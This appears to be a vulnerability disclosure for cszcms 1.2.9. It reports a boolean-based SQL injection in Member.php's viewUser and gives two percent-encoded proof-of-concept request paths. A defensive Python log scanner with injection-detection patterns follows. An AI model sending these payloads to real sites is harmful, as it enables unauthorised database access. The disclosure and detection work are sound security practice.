Hi, I found a front-end SQL injection vulnerability in cszcms-1.2.9
The vulnerable code is on
cszcms\controllers\Member.php#viewUser
The $this->uri->segment(3) parameter here can be controlled by the user
And no filtering leads to SQL injection vulnerability
First register a user in the foreground, then log in, then visit
/member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3e%31%29%2c%31%2c%30%29%23
The content returned by the webpage is:

visit
/member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3c%31%29%2c%31%2c%30%29%23
The content returned by the webpage is:

It's a Boolean-based SQL injection
Suggest: Add a filter function to this parameter
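
For defenders reviewing web server logs for the request pattern reported above, the following is an added example, not part of the original issue or of the cszcms code base. It assumes combined-log-format access logs and that a legitimate third URI segment is a short plain identifier; the function names, the allowlist and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ROUTE = re.compile(r'^/member/viewUser/([^/?#]*)', re.IGNORECASE)
# Assumption: a legitimate third segment is a short plain identifier.
SAFE_SEGMENT = re.compile(r'[A-Za-z0-9_.-]{1,64}')
# Letters and digits never need percent-encoding; encoded ones suggest evasion.
ENCODED_ALNUM = re.compile(r'%(?:3[0-9]|[46][1-9A-Fa-f]|[57][0-9Aa])')
SQL_META = re.compile(r"""['"#;()]|\|\||--|/\*""")

# Constructed sample log; the second request carries the path from the report.
REPORTED = "/member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3e%31%29%2c%31%2c%30%29%23"
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2021:10:00:00 +0000] "GET /member/viewUser/42 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2021:10:00:05 +0000] "GET ' + REPORTED + ' HTTP/1.1" 200 4875',
    '203.0.113.5 - - [01/Jan/2021:10:00:09 +0000] "GET / HTTP/1.1" 200 3011',
]

def fully_decode(value, rounds=3):
    for _ in range(rounds):  # repeat so double-encoded input is exposed too
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def inspect_segment(raw):
    """Reasons a raw (still encoded) third segment looks like injection."""
    decoded = fully_decode(raw)
    checks = [
        ("encoded-alphanumerics", ENCODED_ALNUM.search(raw)),
        ("sql-metacharacters", SQL_META.search(decoded)),
        ("outside-allowlist", not SAFE_SEGMENT.fullmatch(decoded)),
    ]
    return [name for name, hit in checks if hit]

def scan(lines):
    """Return (client, path, reasons) per suspicious viewUser request.
    Assumes combined log format: client first, request line in quotes."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        route = ROUTE.match(m.group(2)) if m else None
        reasons = inspect_segment(route.group(1)) if route else []
        if reasons:
            hits.append((m.group(1), m.group(2), reasons))
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Matching on the decoded segment matters here because the reported path percent-encodes even its letters, so a filter that searches the raw log line for SQL keywords would not see them.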